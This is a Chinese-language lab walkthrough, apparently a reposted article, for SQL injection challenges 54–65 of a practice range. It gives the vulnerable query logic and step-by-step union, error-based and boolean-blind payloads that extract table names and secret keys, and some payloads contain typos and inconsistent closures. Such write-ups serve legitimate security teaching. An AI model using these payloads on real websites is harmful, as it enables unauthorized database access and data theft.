0x01 进阶挑战 54-65
Lesson-54
该题为单引号get型注入,利用方式包括联合查询、布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
if true:
输出查询信息;
else:
输出报错;注意:该题对查询次数进行了限制,我们需要在十次查询以内拿到 key,由于报错不输出 mysql 错误信息,因此不能使用报错注入。
使用联合查询判断注入点
id=1'--+判断字段数
id=1' order by 3--+ //返回正确
id=1' order by 4--+ //返回异常由此可判断字段数为4,通过 union select 查看回显位置
id=-1' union select 1,2,3--+查询表名
id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+查询列名
id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='6r90s8mprd'--+查询关键信息
id=-1' union select 1,2,group_concat(secret_OB1G) from 6r90s8mprd--+成功拿到 key 值:lqZTCWPcYokbGQP8WQdImRzj
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-55
该题为单括号get型注入,利用方式包括联合查询、布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
if true:
输出查询信息;
else:
输出报错;注意:该题与Lesson54的利用方式相同,只不过拼接方式由单引号变成了单括号,错误次数由10次变为14次
使用联合查询判断注入点
id=1)--+判断字段数
id=1) order by 3--+ //返回正确
id=1) order by 4--+ //返回异常由此可判断字段数为4,通过 union select 查看回显位置
id=-1) union select 1,2,3--+查询表名
id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+查询列名
id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='3lr3dby63p'--+查询关键信息
id=-1) union select 1,2,group_concat(secret_WSTL) from 3lr3dby63p--+成功拿到 key 值:omwh2fYfK0SrRVpuGRZai3X6
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-56
该题为单括号单引号get型注入,利用方式包括联合查询、布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
if true:
输出查询信息;
else:
输出报错;注意:该题与Lesson54的利用方式相同,只不过拼接方式由单引号变成了单引号单括号,错误次数由10次变为14次
使用联合查询判断注入点
id=1')--+判断字段数
id=1') order by 3--+ //返回正确
id=1') order by 4--+ //返回异常由此可判断字段数为4,通过 union select 查看回显位置
id=-1') union select 1,2,3--+查询表名
id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+查询列名
id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='iw16doek28'--+查询关键信息
id=-1') union select 1,2,group_concat(secret_CY51) from iw16doek28--+成功拿到 key 值:uQlKpUNr7EbZHR4NfKausIEj
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-57
该题为双引号get型注入,利用方式包括联合查询、布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
$id= '"'.$id.'"';
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
if true:
输出查询信息;
else:
输出报错;注意:该题与Lesson54的利用方式相同,只不过拼接方式由单引号变成了双引号,错误次数由10次变为14次
使用联合查询判断注入点
id=1"--+判断字段数
id=1" order by 3--+ //返回正确
id=1" order by 4--+ //返回异常由此可判断字段数为4,通过 union select 查看回显位置
id=-1" union select 1,2,3--+查询表名
id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+查询列名
id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='mup8sgqrlo'--+查询关键信息
id=-1" union select 1,2,group_concat(secret_EGMD) from mup8sgqrlo--+成功拿到 key 值:UFLHEB2MKHMJWM97fXAajgWB
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-58
该题为单引号get型注入,利用方式包括报错注入、布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
if true:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
print_r(mysql_error());注意:该题只输出$unames和$pass数组,而$pass数组是$uname数组的逆序,因此使用联合查询无法返回我们需要的数据信息。但可以使用报错注入获取数据
使用报错注入判断注入点
id=1'--+查询基础信息
id=1' and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1' and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1' and (select count(*) from information_schema.tables group by concat((select databse()),0x7e,floor(rand(0)*2)))--+查询表名
id=1' and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+查询列名
id=1' and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='me487dxhor' limit 2,1),0x7e,floor(rand(0)*2)))--+查询关键信息
id=1' and (select count(*) from information_schema.tables group by concat((select secret_NMS4 from me487dxhor limit 0,1),0x7e,floor(rand(0)*2)))--+成功拿到 key 值:mx7XGPasBPeRQKfCQJ7LEwt1
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-59
该题为数字型get型注入,利用方式包括报错注入、布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
if true:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
print_r(mysql_error());注意:该题与Lesson58的利用方式相同,只不过拼接方式由单引号转为了数字
使用报错注入判断注入点
id=1--+查询基础信息
id=1 and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1 and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1 and (select count(*) from information_schema.tables group by concat((select databse()),0x7e,floor(rand(0)*2)))--+查询表名
id=1 and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+查询列名
id=1 and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='x1qk033kut' limit 2,1),0x7e,floor(rand(0)*2)))--+查询关键信息
id=1 and (select count(*) from information_schema.tables group by concat((select secret_9MWT from x1qk033kut limit 0,1),0x7e,floor(rand(0)*2)))--+成功拿到 key 值:LtSOIKqX4EC5zCPwOzc6NFS7
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-60
该题为单括号双引号get型注入,利用方式包括报错注入、布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
$id = '("'.$id.'")';
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
if true:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
print_r(mysql_error());注意:该题与Lesson58的利用方式相同,只不过拼接方式由单引号转为了单括号双引号
使用报错注入判断注入点
id=1")--+查询基础信息
id=1") and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1 and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1 and (select count(*) from information_schema.tables group by concat((select databse()),0x7e,floor(rand(0)*2)))--+查询表名
id=1") and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+查询列名
id=1") and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='bc8q88rlor' limit 2,1),0x7e,floor(rand(0)*2)))--+查询关键信息
id=1") and (select count(*) from information_schema.tables group by concat((select secret_DAAH from bc8q88rlor limit 0,1),0x7e,floor(rand(0)*2)))--+成功拿到 key 值:O8c2mJWO68hDxl7cAPYNpElM
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-61
该题为双括号单引号get型注入,利用方式包括报错注入、布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
if true:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
print_r(mysql_error());注意:该题与Lesson58的利用方式相同,只不过拼接方式由单引号转为了双括号单引号
使用报错注入判断注入点
id=1'))--+查询基础信息
id=1')) and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1')) and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1')) and (select count(*) from information_schema.tables group by concat((select databse()),0x7e,floor(rand(0)*2)))--+查询表名
id=1')) and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+查询列名
id=1')) and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='upre7krqfg' limit 2,1),0x7e,floor(rand(0)*2)))--+查询关键信息
id=1')) and (select count(*) from information_schema.tables group by concat((select secret_EX6I from upre7krqfg limit 0,1),0x7e,floor(rand(0)*2)))--+成功拿到 key 值:6lB7uSQQDKE96ZNcXEDiREHG
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-62
该题为单括号单引号get型注入,利用方式包括布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
if true:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
输出报错;注意:该题与Lesson58的利用方式相同,只不过拼接方式由单引号转为了单括号单引号,同时不再输出数据库报错信息,因此不能使用报错注入,只能使用盲注
使用布尔盲注判断注入点
id=1')--+查询长度
id=1') and length(user())>13--+ //返回正常界面
id=1') and length(user())>14--+ //返回不同界面两次结果不同,由此判断长度为 14
查询字符
id=1') and substr(user(),1,1)='r'--+ //返回正常界面
id=1') and left(user(),1)='r'--+ //left()函数
id=1') and rand(ascii(substr(user(),1,1))=114--+ //ASCII码id=1') and substr(user(),1,1)='s'--+ //返回不同界面确定用户名为[email protected]
id=1') and substr(user(),1,14)='root@localhost'--+以此类推根据返回界面是否不同即可查询数据库名、表名、列名等
id=1') and substr((select database()),1,14)='challenges'--+手工注入太过繁琐,最后还是需要依赖 sqlmap 等注入工具来拿到最后的 key
Lesson-63
该题为单引号get型注入,利用方式包括布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
if true:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
输出报错;注意:该题与Lesson62的利用方式相同,只不过拼接方式由单括号单引号转为了单引号
使用布尔盲注判断注入点
id=1'--+查询长度
id=1' and length(user())>13--+ //返回正常界面
id=1' and length(user())>14--+ //返回不同界面两次结果不同,由此判断长度为 14
查询字符
id=1' and substr(user(),1,1)='r'--+ //返回正常界面
id=1' and left(user(),1)='r'--+ //left()函数
id=1' and rand(ascii(substr(user(),1,1))=114--+ //ASCII码id=1' and substr(user(),1,1)='s'--+ //返回不同界面确定用户名为[email protected]
id=1' and substr(user(),1,14)='root@localhost'--+以此类推根据返回界面是否不同即可查询数据库名、表名、列名等
id=1' and substr((select database()),1,14)='challenges'--+手工注入太过繁琐,最后还是需要依赖 sqlmap 等注入工具来拿到最后的 key
Lesson-64
该题为双括号get型注入,利用方式包括布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
if true:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
输出报错;注意:该题与Lesson62的利用方式相同,只不过拼接方式由单括号单引号转为了双括号
使用布尔盲注判断注入点
id=1))--+查询长度
id=1)) and length(user())>13--+ //返回正常界面
id=1)) and length(user())>14--+ //返回不同界面两次结果不同,由此判断长度为 14
查询字符
id=1)) and substr(user(),1,1)='r'--+ //返回正常界面
id=1)) and left(user(),1)='r'--+ //left()函数
id=1)) and rand(ascii(substr(user(),1,1))=114--+ //ASCII码id=1)) and substr(user(),1,1)='s'--+ //返回不同界面确定用户名为[email protected]
id=1)) and substr(user(),1,14)='[email protected]'--+以此类推根据返回界面是否不同即可查询数据库名、表名、列名等
id=1)) and substr((select database()),1,14)='challenges'--+手工注入太过繁琐,最后还是需要依赖 sqlmap 等注入工具来拿到最后的 key
Lesson-65
该题为单括号双引号get型注入,利用方式包括布尔盲注、时间盲注
id=1'目标SQL语句如下:
if ($_POST['reset']):
setcookie('challenge', ' ', time() - 3600000);
else:
if ($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
if ($_GET['id']):
$id=$_GET['id'];
$id = '"'.$id.'"';
next_tryy() >= ($times+1)
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
if true:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
输出报错;注意:该题与Lesson62的利用方式相同,只不过拼接方式由单括号单引号转为了单括号双引号
使用布尔盲注判断注入点
id=1")--+查询长度
id=1") and length(user())>13--+ //返回正常界面
id=1") and length(user())>14--+ //返回不同界面两次结果不同,由此判断长度为 14
查询字符
id=1") and substr(user(),1,1)='r'--+ //返回正常界面
id=1") and left(user(),1)='r'--+ //left()函数
id=1") and rand(ascii(substr(user(),1,1))=114--+ //ASCII码id=1") and substr(user(),1,1)='s'--+ //返回不同界面确定用户名为[email protected]
id=1") and substr(user(),1,14)='[email protected]'--+以此类推根据返回界面是否不同即可查询数据库名、表名、列名等
id=1") and substr((select database()),1,14)='challenges'--+手工注入太过繁琐,最后还是需要依赖 sqlmap 等注入工具来拿到最后的 key
0x02 总结
该靶场是学习 SQL 注入的好途径,刷完全部题目后面对 SQL 注入的了解有很大帮助,整个靶场以 MySQL + PHP 搭建环境为主,根据不同环境切换了 Windows、Linux 以及 Tomcat 代理。如果想要测试目标点是否存在 SQL 注入,我们应该从请求方式、注入点闭合方式、请求头部、后端SQL语句以及注入方式等方面进行考虑,确定了这些后再想方设法绕过站点中的 WAF、编码限制,其实这就是手工注入的魅力,当然会使用 sqlmap 也是一件好事,有了手工+自动两种方式的结合,在面对一般的 SQL 注入问题都可以迎刃而解。至此,sql注入靶场完结。
0x03 知识星球
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
文末福利!!!
加免费星球获《GO黑帽子-渗透测试编程之道一书》
文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247494749&idx=2&sn=c1dcfed9760b28e31bb8740bdce26232&chksm=c17611f2f60198e471428678bbde0ebc1e0d948f08338b7f9ec95321d6b903f86406fff0a683#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh